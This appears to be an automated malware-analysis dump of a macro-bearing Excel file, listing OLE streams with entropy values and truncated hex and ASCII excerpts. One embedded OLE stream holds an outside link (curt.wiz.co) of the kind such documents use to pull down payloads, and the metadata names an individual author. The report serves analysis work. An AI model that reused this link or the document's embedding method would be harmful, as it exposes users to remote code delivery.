          Data ASCII:P K . . . . . . . . . . ! . 8 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 b7 a1 38 de e3 01 00 00 cb 09 00 00 13 00 e9 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 e5 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.25248375192737
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:244
          Entropy:2.701136490257069
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00
          General
          Stream Path:MBD010681DC/\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:220
          Entropy:3.372234242231489
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:MBD010681DC/MBD0018D4CE/\x1Ole
          CLSID:
          File Type:data
          Stream Size:20
          Entropy:0.5689955935892812
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . .
          Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD0018D4CE/\x3ObjInfo
          CLSID:
          File Type:data
          Stream Size:4
          Entropy:0.8112781244591328
          Base64 Encoded:False
          Data ASCII:. . . .
          Data Raw:00 00 03 00
          General
          Stream Path:MBD010681DC/MBD0018D4CE/Contents
          CLSID:
          File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
          Stream Size:197671
          Entropy:6.989042939766534
          Base64 Encoded:True
          Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD0068D442/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.219515110876372
          Base64 Encoded:False
          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD0068D442/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:26243
          Entropy:7.635433729726103
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD007203CB/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.25248375192737
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD007203CB/\x5DocumentSummaryInformation
          CLSID:
          File Type:data
          Stream Size:248
          Entropy:3.0523231150355867
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:MBD010681DC/MBD007203CB/\x5SummaryInformation
          CLSID:
          File Type:data
          Stream Size:256
          Entropy:4.086306928392587
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
          General
          Stream Path:MBD010681DC/MBD007203CB/Workbook
          CLSID:
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:134792
          Entropy:7.974168320310173
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
          CLSID:
          File Type:ASCII text, with CRLF line terminators
          Stream Size:468
          Entropy:5.269289820125323
          Base64 Encoded:True
          Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
          Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
          CLSID:
          File Type:data
          Stream Size:83
          Entropy:3.0672749060249043
          Base64 Encoded:False
          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
          CLSID:
          File Type:data
          Stream Size:2486
          Entropy:3.9244127831265385
          Base64 Encoded:False
          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
          Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
          General
          Stream Path:MBD010681DC/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
          CLSID:
          File Type:data
          Stream Size:536
          Entropy:6.330646364694152
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
          Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
          General
          Stream Path:MBD010681DC/MBD00726B69/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:114
          Entropy:4.219515110876372
          Base64 Encoded:False
          Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/MBD00726B69/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:26242
          Entropy:7.635424485665502
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DC/Workbook
          CLSID:
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:283872
          Entropy:7.743278150467805
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
          General
          Stream Path:MBD010681DD/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:99
          Entropy:3.631242196770981
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DD/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:45934
          Entropy:7.5587990853484195
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD010681DE/\x1Ole
          CLSID:
          File Type:data
          Stream Size:560
          Entropy:5.607558056244155
          Base64 Encoded:False
          Data ASCII:. . . . . 0 . . i V . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . s . : . / . / . c . u . r . t . . . w . i . z . . . c . o . / . V . v . B . B . U . A . l . 9 . T . i . ? . & . c . o . m . p . u . l . s . i . o . n . = . z . e . a . l . o . u . s . & . m . o . o . d . . . 2 . . . h 6 j . l . / . . . . . . . + k . . w ^ E . M Y % q . * 1 W . _ U . . a . ^ 8 U \\ . . h . n 8 . . . [ # . + o $ j = r u ] . . 2 u h . k . N 8 E W I J . . . W . 7 = > 1 . . [ & o % . . . . . . . . . . . . . .
          Data Raw:01 00 00 02 0d 95 30 02 d2 0c 69 56 00 00 00 00 00 00 00 00 00 00 00 00 16 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 12 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 75 00 72 00 74 00 2e 00 77 00 69 00 7a 00 2e 00 63 00 6f 00 2f 00 56 00 76 00 42 00 42 00 55 00 41 00 6c 00 39 00 54 00 69 00 3f 00 26 00 63 00 6f 00 6d 00 70 00 75 00 6c 00 73 00 69 00
          General
          Stream Path:Workbook
          CLSID:
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:316629
          Entropy:7.998637073721496
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . . } . . . m v v . i J , . i X ! . N > B = u . ~ G / . . . . . . . . . . t . . . . \\ . p . N 6 P . D J S 6 j b | | > } S - . . j ' 8 . 0 O g / # . ^ h c O ` k . C f n / . 3 _ . . . + G . v o . E _ 0 t D j : / B . . . n a . . . . . . . = . . . x F Q . . . . S } 4 . . 8 . X . . . . A . . . . . . . . . " . . . . = . . . 1 . . . . = . . . 4 . E . m @ . . . x . . . 3 " . . . S . . . . . ~ . . . . . . { . 1 . . . . * . d + . 3 f # ? " 5 s # v N . 1 . . . G .
          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 de 86 95 1f 7d 15 00 db e7 01 c7 6d 76 c6 76 19 e3 69 b3 84 bd 4a 2c a8 1c bf 69 58 c0 f1 98 21 1a 4e d9 fd 3e e4 42 3d b4 ce 75 00 bb 7e 47 2f 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 74 00 e2 00 00 00 5c 00 70 00 4e 36 50 03 9f a8 e0 44 be 4a 53 fa 80 36 6a 62 7c 7c c8 3e a3 7d c3 53 bd c8
          General
          Stream Path:_VBA_PROJECT_CUR/PROJECT
          CLSID:
          File Type:ASCII text, with CRLF line terminators
          Stream Size:527
          Entropy:5.279649998615774
          Base64 Encoded:True
          Data ASCII:I D = " { 5 2 B 6 0 E C 6 - 0 9 9 E - 4 D 8 C - 8 A 5 B - B 7 8 B 7 D 3 C E C 8 7 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " B F B D A 1 A E 6 3 5 6 D C 5 A D
          Data Raw:49 44 3d 22 7b 35 32 42 36 30 45 43 36 2d 30 39 39 45 2d 34 44 38 43 2d 38 41 35 42 2d 42 37 38 42 37 44 33 43 45 43 38 37 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
          General
          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
          CLSID:
          File Type:data
          Stream Size:104
          Entropy:3.0488640812019017
          Base64 Encoded:False
          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
          General
          Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
          CLSID:
          File Type:data
          Stream Size:2644
          Entropy:3.982462153871729
          Base64 Encoded:True
          Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
